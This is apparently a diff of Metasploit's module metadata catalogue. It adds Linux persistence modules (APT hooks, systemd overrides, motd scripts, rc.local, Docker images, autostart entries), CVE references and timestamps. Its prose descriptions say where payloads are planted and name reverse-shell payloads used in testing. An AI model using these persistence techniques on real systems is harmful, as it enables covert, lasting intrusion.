+    "ref_name": "linux/local/rootkit_privesc_signal_hunter",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
  "exploit_linux/local/runc_cwd_priv_esc": {
    "name": "runc (docker) File Descriptor Leak Privilege Escalation",
    "fullname": "exploit/linux/local/runc_cwd_priv_esc",
@@ -92152,56 +92514,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/service_persistence": {
-    "name": "Service Persistence",
-    "fullname": "exploit/linux/local/service_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1983-01-01",
-    "type": "exploit",
-    "author": [
-      "h00die <mike@shorebreaksecurity.com>",
-      "Cale Black"
-    ],
-    "description": "This module will create a service on the box, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services\n          Targets:\n          System V:\n          CentOS <= 5\n          Debian <= 6\n          Kali 2.0\n          Ubuntu <= 9.04\n          Upstart:\n          CentOS 6\n          Fedora >= 9, < 15\n          Ubuntu >= 9.10, <= 14.10\n          systemd:\n          CentOS 7\n          Debian >= 7, <=8\n          Fedora >= 15\n          Ubuntu >= 15.04\n          Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.",
-    "references": [
-      "URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples"
-    ],
-    "platform": "Linux,Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Auto",
-      "System V",
-      "Upstart",
-      "openrc",
-      "systemd",
-      "systemd user"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/service_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/service_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/servu_ftp_server_prepareinstallation_priv_esc": {
    "name": "Serv-U FTP Server prepareinstallation Privilege Escalation",
    "fullname": "exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc",
@@ -93436,51 +93748,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_linux/local/yum_package_manager_persistence": {
-    "name": "Yum Package Manager Persistence",
-    "fullname": "exploit/linux/local/yum_package_manager_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2003-12-17",
-    "type": "exploit",
-    "author": [
-      "Aaron Ringo"
-    ],
-    "description": "This module will run a payload when the package manager is used. No\n          handler is ran automatically so you must configure an appropriate\n          exploit/multi/handler to connect. Module modifies a yum plugin to\n          launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/\n          will show what plugins are currently enabled on the system.",
-    "references": [],
-    "platform": "Linux,Unix",
-    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/linux/local/yum_package_manager_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "linux/local/yum_package_manager_persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_linux/local/zimbra_postfix_priv_esc": {
    "name": "Zimbra sudo + postfix privilege escalation",
    "fullname": "exploit/linux/local/zimbra_postfix_priv_esc",
@@ -93591,7 +93858,9 @@
      "juan vazquez <juan.vazquez@metasploit.com>"
    ],
    "description": "This module abuses the zsudo binary, installed with zpanel, to escalate\n            privileges. In order to work, a session with access to zsudo on the sudoers\n            configuration is needed. This module is useful for post exploitation of ZPanel\n            vulnerabilities, where typically web server privileges are acquired, and this\n            user is allowed to execute zsudo on the sudoers file.",
-    "references": [],
+    "references": [
+      "CVE-2013-10052"
+    ],
    "platform": "Linux,Unix",
    "arch": "cmd, x86",
    "rport": null,
@@ -93601,7 +93870,7 @@
      "Command payload",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/local/zpanel_zsudo.rb",
    "is_install_path": true,
    "ref_name": "linux/local/zpanel_zsudo",
@@ -94733,6 +95002,7 @@
    ],
    "description": "This module exploits a command injection vulnerability in IGEL OS Secure Terminal\n          and Secure Shadow services.\n\n          Both Secure Terminal (telnet_ssl_connector - 30022/tcp) and Secure\n          Shadow (vnc_ssl_connector - 5900/tcp) services are vulnerable.",
    "references": [
+      "CVE-2025-34082",
      "URL-https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html",
      "URL-https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt"
    ],
@@ -94745,7 +95015,7 @@
      "Secure Terminal Service",
      "Secure Shadow Service"
    ],
-    "mod_time": "2021-04-30 15:38:57 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/misc/igel_command_injection.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/igel_command_injection",
@@ -95029,6 +95299,7 @@
    ],
    "description": "Routers manufactured by Netcore, a popular brand for networking\n          equipment in China, have a wide-open backdoor that can be fairly\n          easily exploited by attackers. These products are also sold under\n          the Netis brand name outside of China. This backdoor allows\n          cyber criminals to easily run arbitrary code on these routers,\n          rendering it vulnerable as a security device.\n          Some models include a non-standard echo command which doesn't\n          honor -e, and are therefore not currently exploitable with\n          Metasploit.  See URLs or module markdown for additional options.",
    "references": [
+      "CVE-2025-34117",
      "URL-https://www.seebug.org/vuldb/ssvid-90227",
      "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/",
      "URL-https://github.com/h00die/MSF-Testing-Scripts/blob/master/netis_backdoor.py"
@@ -95042,7 +95313,7 @@
      "MIPS Little Endian",
      "MIPS Big Endian"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/netcore_udp_53413_backdoor",
@@ -95413,6 +95684,7 @@
    ],
    "description": "This module will cause remote code execution on several SerComm devices.\n          These devices typically include routers from NetGear and Linksys.\n          This module was tested successfully against several NetGear, Honeywell\n          and Cisco devices.",
    "references": [
+      "CVE-2014-0659",
      "OSVDB-101653",
      "URL-https://github.com/elvanderb/TCP-32764"
    ],
@@ -95435,7 +95707,7 @@
      "Netgear DSG835",
      "Netgear WPNT834"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/misc/sercomm_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/sercomm_exec",
@@ -95907,6 +96179,107 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/persistence/apt_package_manager": {
+    "name": "APT Package Manager Persistence",
+    "fullname": "exploit/linux/persistence/apt_package_manager",
+    "aliases": [
+      "exploits/linux/local/apt_package_manager_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1999-03-09",
+    "type": "exploit",
+    "author": [
+      "Aaron Ringo"
+    ],
+    "description": "This module will run a payload when the APT package manager is used.\n          This module creates a pre-invoke hook for APT in apt.conf.d. Write access\n          to the apt.conf.d directory is required, typically requiring root access.\n          The hook name is randomized if not specified.\n          Verified on Ubuntu 22.04",
+    "references": [],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 10:33:10 +0000",
+    "path": "/modules/exploits/linux/persistence/apt_package_manager.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/apt_package_manager",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/autostart": {
+    "name": "Autostart Desktop Item Persistence",
+    "fullname": "exploit/linux/persistence/autostart",
+    "aliases": [
+      "exploits/linux/local/autostart_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2006-02-13",
+    "type": "exploit",
+    "author": [
+      "Eliott Teissonniere"
+    ],
+    "description": "This module will create an autostart .desktop entry to execute a payload.\n          The payload will be executed when the users logs in.\n          Verified on Ubuntu 22.04 desktop with Gnome, and 18.04.3.\n          The following payloads were used in testing:\n          - cmd/unix/reverse_netcat\n          - linux/x64/meterpreter/reverse_tcp\n          - cmd/linux/http/x64/meterpreter/reverse_tcp",
+    "references": [
+      "ATT&CK-T1547.013",
+      "URL-https://specifications.freedesktop.org/autostart-spec/latest/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-10 13:59:23 +0000",
+    "path": "/modules/exploits/linux/persistence/autostart.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/autostart",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
  "exploit_linux/persistence/bash_profile": {
    "name": "Bash Profile Persistence",
    "fullname": "exploit/linux/persistence/bash_profile",
@@ -95931,7 +96304,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-09-01 18:09:25 +0000",
+    "mod_time": "2025-09-09 10:02:06 +0000",
    "path": "/modules/exploits/linux/persistence/bash_profile.rb",
    "is_install_path": true,
    "ref_name": "linux/persistence/bash_profile",
@@ -95958,6 +96331,472 @@
    "needs_cleanup": null,
    "actions": []
  },
+  "exploit_linux/persistence/docker_image": {
+    "name": "Docker Image Persistence",
+    "fullname": "exploit/linux/persistence/docker_image",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2013-03-20",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module maintains persistence on a host by creating a docker image which runs our\n          payload, and has access to the host's file system (/host in the container). Whenever the\n          container restarts, the payload will run, or when the payload dies the executable\n          will run again after a delay. This will allow for writing back\n          into the host through cron entries, ssh keys, or other method.\n\n          Verified on Ubuntu 22.04.",
+    "references": [
+      "ATT&CK-T1610"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2025-09-16 15:57:24 +0000",
+    "path": "/modules/exploits/linux/persistence/docker_image.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/docker_image",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_openrc": {
+    "name": "Init OpenRC Persistence",
+    "fullname": "exploit/linux/persistence/init_openrc",
+    "aliases": [
+      "exploits/linux/local/service_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2007-04-05",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module will create a service on the box via OpenRC, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services.\n          Verified against alpine 3.21.2",
+    "references": [
+      "URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
+      "ATT&CK-T1543",
+      "URL-https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts",
+      "URL-https://wiki.alpinelinux.org/wiki/OpenRC",
+      "URL-https://github.com/OpenRC/openrc/blob/master/service-script-guide.md"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-11 12:00:52 +0000",
+    "path": "/modules/exploits/linux/persistence/init_openrc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_openrc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_systemd": {
+    "name": "Service SystemD Persistence",
+    "fullname": "exploit/linux/persistence/init_systemd",
+    "aliases": [
+      "exploits/linux/local/service_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2010-03-30",
+    "type": "exploit",
+    "author": [
+      "h00die <mike@shorebreaksecurity.com>",
+      "Cale Black"
+    ],
+    "description": "This module will create a service on the box, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services\n          Targets:\n          CentOS 7\n          Debian >= 7, <=8\n          Fedora >= 15\n          Ubuntu >= 15.04\n          Verified on Ubuntu 18.04.3",
+    "references": [
+      "URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
+      "URL-https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/",
+      "ATT&CK-T1543.002"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "systemd",
+      "systemd user"
+    ],
+    "mod_time": "2025-09-09 16:19:32 +0000",
+    "path": "/modules/exploits/linux/persistence/init_systemd.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_systemd",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_systemd_override": {
+    "name": "Service SystemD override.conf Persistence",
+    "fullname": "exploit/linux/persistence/init_systemd_override",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2010-03-30",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module will create an override.conf file for a SystemD service on the box.\n          The ExecStartPost hook is used to launch the payload after the service is started.\n          We need enough access (typically root) to write in the /etc/systemd/system\n          directory and potentially restart services.\n          Verified on Ubuntu 22.04",
+    "references": [
+      "URL-https://www.freedesktop.org/software/systemd/man/latest/systemd.service.html",
+      "URL-https://askubuntu.com/a/659268",
+      "URL-https://wiki.archlinux.org/title/Systemd",
+      "ATT&CK-T1543.002"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "systemd",
+      "systemd user"
+    ],
+    "mod_time": "2025-09-26 15:00:09 +0000",
+    "path": "/modules/exploits/linux/persistence/init_systemd_override.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_systemd_override",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_sysvinit": {
+    "name": "Service System V Persistence",
+    "fullname": "exploit/linux/persistence/init_sysvinit",
+    "aliases": [
+      "exploits/linux/local/service_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1983-01-01",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module will create a service via System V on the box, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services.\n\n          Some systems include backwards compatibility, such as Ubuntu up to about 16.04.\n\n          Targets:\n          CentOS <= 5\n          Debian <= 6\n          Kali 2.0\n          Ubuntu <= 6.06\n          Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.\n\n          Verified on Kali 2.0, Ubuntu 10.04",
+    "references": [
+      "URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
+      "ATT&CK-T1543"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "System V"
+    ],
+    "mod_time": "2025-10-14 19:30:06 +0000",
+    "path": "/modules/exploits/linux/persistence/init_sysvinit.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_sysvinit",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/init_upstart": {
+    "name": "Service Upstart Persistence",
+    "fullname": "exploit/linux/persistence/init_upstart",
+    "aliases": [
+      "exploits/linux/local/service_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2006-08-24",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module will create a service on the box, and mark it for auto-restart.\n          We need enough access to write service files and potentially restart services\n          Targets:\n          CentOS 6\n          Fedora >= 9, < 15\n          Ubuntu >= 9.10, <= 14.10",
+    "references": [
+      "URL-https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples",
+      "ATT&CK-T1543",
+      "URL-http://blog.terminal.com/getting-started-with-upstart/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Upstart"
+    ],
+    "mod_time": "2025-10-27 19:44:50 +0000",
+    "path": "/modules/exploits/linux/persistence/init_upstart.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/init_upstart",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_linux/persistence/motd": {
+    "name": "update-motd.d Persistence",
+    "fullname": "exploit/linux/persistence/motd",
+    "aliases": [
+      "exploits/linux/local/motd_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1999-01-01",
+    "type": "exploit",
+    "author": [
+      "Julien Voisin"
+    ],
+    "description": "This module will add a script in /etc/update-motd.d/ in order to persist a payload.\n          The payload will be executed with root privileges everytime a user logs in.\n          Root privileges are likely required to write to /etc/update-motd.d/.\n          Verified on Ubuntu 22.04",
+    "references": [
+      "URL-https://manpages.ubuntu.com/manpages/oracular/en/man5/update-motd.5.html"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 14:29:07 +0000",
+    "path": "/modules/exploits/linux/persistence/motd.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/motd",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_linux/persistence/rc_local": {
+    "name": "rc.local Persistence",
+    "fullname": "exploit/linux/persistence/rc_local",
+    "aliases": [
+      "exploits/linux/local/rc_local_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1980-10-01",
+    "type": "exploit",
+    "author": [
+      "Eliott Teissonniere"
+    ],
+    "description": "This module will edit /etc/rc.local in order to persist a payload.\n          The payload will be executed on the next reboot.\n          Verified on Ubuntu 18.04.3",
+    "references": [
+      "ATT&CK-T1037.004"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-09 14:58:09 +0000",
+    "path": "/modules/exploits/linux/persistence/rc_local.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/rc_local",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_linux/persistence/yum_package_manager": {
+    "name": "Yum Package Manager Persistence",
+    "fullname": "exploit/linux/persistence/yum_package_manager",
+    "aliases": [
+      "exploits/linux/local/yum_package_manager_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2003-12-17",
+    "type": "exploit",
+    "author": [
+      "Aaron Ringo"
+    ],
+    "description": "This module will run a payload when the package manager is used.\n          This module modifies a yum plugin to launch a binary of choice.\n          grep -F 'enabled=1' /etc/yum/pluginconf.d/\n          will show what plugins are currently enabled on the system.\n          root persmissions are likely required.\n          Verified on Centos 7.1",
+    "references": [],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-18 16:15:24 +0000",
+    "path": "/modules/exploits/linux/persistence/yum_package_manager.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/yum_package_manager",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
  "exploit_linux/pop3/cyrus_pop3d_popsubfolders": {
    "name": "Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",
    "fullname": "exploit/linux/pop3/cyrus_pop3d_popsubfolders",
@@ -96218,6 +97057,7 @@
    ],
    "description": "This module can be used to leverage the extension functionality added since Redis 4.0.0\n          to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis\n          which called replication between master and slave.",
    "references": [
+      "CVE-2018-11218",
      "URL-https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf",
      "URL-https://github.com/RedisLabs/RedisModulesSDK"
    ],
@@ -96229,7 +97069,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-05-21 02:07:54 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/redis/redis_replication_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/redis/redis_replication_cmd_exec",
@@ -96355,7 +97195,7 @@
      "Linux SPARC64",
      "Linux s390x"
    ],
-    "mod_time": "2025-06-06 12:39:33 +0000",
+    "mod_time": "2025-09-17 11:04:28 +0000",
    "path": "/modules/exploits/linux/samba/is_known_pipename.rb",
    "is_install_path": true,
    "ref_name": "linux/samba/is_known_pipename",
@@ -97685,6 +98525,7 @@
    ],
    "description": "This module exploits a command injection in the Belkin Wemo UPnP API via\n          the SmartDevURL argument to the SetSmartDevInfo action.\n\n          This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo\n          devices are known to be affected, albeit on a different RPORT (49153).",
    "references": [
+      "CVE-2019-12780",
      "URL-https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/",
      "URL-https://github.com/phikshun/ufuzz",
      "URL-https://gist.github.com/phikshun/10900566",
@@ -97715,7 +98556,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2025-05-18 16:29:41 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/upnp/belkin_wemo_upnp_exec",
@@ -101030,6 +101871,7 @@
    ],
    "description": "This module harnesses Maple's ability to create files and execute commands\n          automatically when opening a Maplet. All versions up to 13 are suspected\n          vulnerable. Testing was conducted with version 13 on Windows. Standard security\n          settings prevent code from running in a normal maple worksheet without user\n          interaction, but those setting do not prevent code in a Maplet from running.\n\n          In order for the payload to be executed, an attacker must convince someone to\n          open a specially modified .maplet file with Maple. By doing so, an attacker can\n          execute arbitrary code as the victim user.",
    "references": [
+      "CVE-2010-20120",
      "OSVDB-64541",
      "URL-http://www.maplesoft.com/products/maple/"
    ],
@@ -101045,7 +101887,7 @@
      "Linux X64",
      "Universal CMD"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/fileformat/maple_maplet.rb",
    "is_install_path": true,
    "ref_name": "multi/fileformat/maple_maplet",
@@ -101896,6 +102738,7 @@
    ],
    "description": "This module exploits an arbitrary command execution vulnerability in the\n          AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to\n          2.6 are vulnerable.",
    "references": [
+      "CVE-2010-10013",
      "OSVDB-63552",
      "BID-39334"
    ],
@@ -101920,7 +102763,7 @@
    "targets": [
      "AjaXplorer 2.5.5 or older"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/ajaxplorer_checkinstall_exec",
@@ -103357,6 +104200,7 @@
    ],
    "description": "This module exploits a vulnerability found in Auxilium RateMyPet's. The site\n          banner uploading feature can be abused to upload an arbitrary file to the web\n          server, which is accessible in the 'banner' directory, thus allowing remote code\n          execution.",
    "references": [
+      "CVE-2012-10038",
      "OSVDB-85554",
      "EDB-21329"
    ],
@@ -103382,7 +104226,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/auxilium_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/http/auxilium_upload_exec",
@@ -103782,6 +104626,7 @@
    ],
    "description": "This module exploits a vulnerability found in BuilderEngine 3.5.0\n          via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious\n          file, which would result in arbitrary remote code execution under the context of\n          the web server.",
    "references": [
+      "CVE-2025-34100",
      "EDB-40390"
    ],
    "platform": "PHP",
@@ -103805,7 +104650,7 @@
    "targets": [
      "BuilderEngine 3.5.0"
    ],
